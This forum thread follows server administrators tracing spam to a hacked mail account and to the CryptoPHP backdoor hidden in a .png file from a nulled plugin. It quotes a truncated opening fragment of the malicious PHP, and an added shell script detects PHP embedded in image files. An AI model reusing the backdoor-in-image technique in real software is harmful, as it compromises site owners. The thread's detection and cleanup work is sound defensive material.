Which script sends spam?

Richard G (Verified User, joined Jul 6, 2008, Maastricht)
Is there a way to discover which script is sending spam?
On a cPanel server I can always see it in the headers of mails which are returned.

I always thought this could also be done by adding these lines to exim.conf log_selector:
Code:
+connection_reject \
+address_rewrite \
+all_parents \
+arguments \

It seems, though, that our server IP is suddenly on the abuseat blacklist because, according to the info, the server is infected with CryptoPHP malware or another spambot.

I can't see anything in the mail queues though. Maldet is running but takes forever to scan the whole server.

Is there another way so the sending script will get mentioned in the mail header somewhere?
 
Hello,

With patched PHP 5.2 and mail.add_x_header a sending script can be seen in mail headers. I'm sure you are aware of it.

Recently I've seen a very unusual way of sending spam through a server. No sockets were used, and no traces in mail logs or elsewhere. Just a copy of the httpd server running on another port. Make sure you've got no copy of the httpd server on a high-number port or any other cron tasks running.
 
I'm running PHP 5.3 and mail.add_x_header is on by default as far as I can see.
I'm indeed experiencing the thing you mention. Nothing is to be seen in logs. However, I ran into some mails in the mail queue. Looks like an email account was hacked.

However, I must also investigate Maldetect. This should be running every night. It does. It found something on October 3rd, but I did not get an email about it.
Maldetect is not sending out emails, in spite of the fact that email_alert=1 is set in maldet.conf.
The manual scan last night showed 17 infected files.

However, this did not include the user which caused the problem. Also... on another server maldet found nothing, and there also was 1 user which was sending out spam and CBL said CryptoPHP malware was present. So probably that user's account was hacked too.

Any clue on why Maldet is not sending mails?
 
Hacker found on 1 server. It was not a script, it was a hacked email account, so authenticated mail was used to spam.
However, not with 100's of mails at a time, because then it would be easily found.
 
Found the backdoor.
It was indeed CryptoPHP, and a .png file was causing the trouble. The png is imported when installing a plugin from a malicious website.
It's now known that a script called Jsecure downloaded from nulledstylez.com contains the backdoor trojan, but there are more, not only for Joomla but also for WordPress.

The .png file contains things like (opened with vim):
<?php error_reporting(0); ini_set('display_errors', 0);@ini_set('max_execution_time', 300);@set_time_limit(0);function XJmVaOhvhAQNoaACoDOM() { if (!defined('WP_OPTION_KEY')) { define('WP_OPTION_KEY', 'wp_data_newa');
etc., which should not be in there. Fox-IT discovered this.
And opened with nano, you can even see a public key block.

Glad I found this mother with help of my colleagues in the Netherlands and Fox-IT.
 
Maldet, as was noticed, does not find scripts and malware which are not known to it. It uses hashes etc. Another way to find malware is to read PHP scripts and/or other files and check their content, either by running find, read, grep or using this: http://cbl.abuseat.org/findbot.pl
 
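The two checks from the posts above (looking inside image files for PHP, and grepping file contents rather than relying on signatures) combined into one shell example. This is added here and is not code from the thread or from findbot.pl; the sample files it creates are constructed for the demo, not real malware.

```shell
# Flag files with image extensions whose first bytes are not a PNG/JPEG/GIF
# magic header, or which contain a PHP open tag after a valid header.
# Prints one line per suspicious file under the directory given as $1.
scan_images() {
    local dir="$1" f head4
    find "$dir" -type f \( -iname '*.png' -o -iname '*.jpg' \
         -o -iname '*.jpeg' -o -iname '*.gif' \) |
    while IFS= read -r f; do
        # First 4 bytes as hex; a PHP file starts with "<?" (3c3f) instead.
        head4=$(head -c 4 "$f" | od -An -tx1 | tr -d ' \n')
        case "$head4" in
            89504e47|ffd8ff*|47494638) : ;;          # PNG, JPEG, GIF
            *) echo "$f (bad magic: $head4)"; continue ;;
        esac
        # Header is genuine, but PHP may be appended or embedded in the data.
        if grep -qaE '<\?(php|=)' "$f"; then
            echo "$f (php tag inside image)"
        fi
    done
}

# Constructed sample tree (hypothetical content, labelled per file).
make_samples() {
    local d
    d=$(mktemp -d)
    # clean: real PNG signature, no code
    printf '\211PNG\r\n\032\n....' > "$d/clean.png"
    # clean: real JPEG signature
    printf '\377\330\377\340....' > "$d/photo.jpg"
    # suspicious: PHP source saved as .png (opens as text in vim, as in the thread)
    printf '<?php echo "stub"; ?>\n' > "$d/social.png"
    # suspicious: valid GIF header with PHP appended after the image data
    printf 'GIF89a....<?php echo 1; ?>' > "$d/avatar.gif"
    echo "$d"
}

demo_dir=$(make_samples)
scan_images "$demo_dir"
rm -rf "$demo_dir"
```

Run it against a web root (scan_images /home/user/public_html) and inspect each hit by hand; a flagged file is a lead, not a verdict.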
Yes, I know about findbot.pl. Have you ever used it? I tried and you get hundreds of results with "suspicious" behind it. Mostly all normal, legal files.
I never thought it could be an image file. So I have learned a lesson. ;)
 
Recently I've seen a very unusual way of sending spam through a server. No sockets were used, and no traces in mail logs or elsewhere. Just a copy of the httpd server running on another port. Make sure you've got no copy of the httpd server on a high-number port or any other cron tasks running.
Alex,

Was it actually a copy of apache or other httpd server? Or another program just using the name httpd in the hopes you wouldn't notice it?

Jeff
 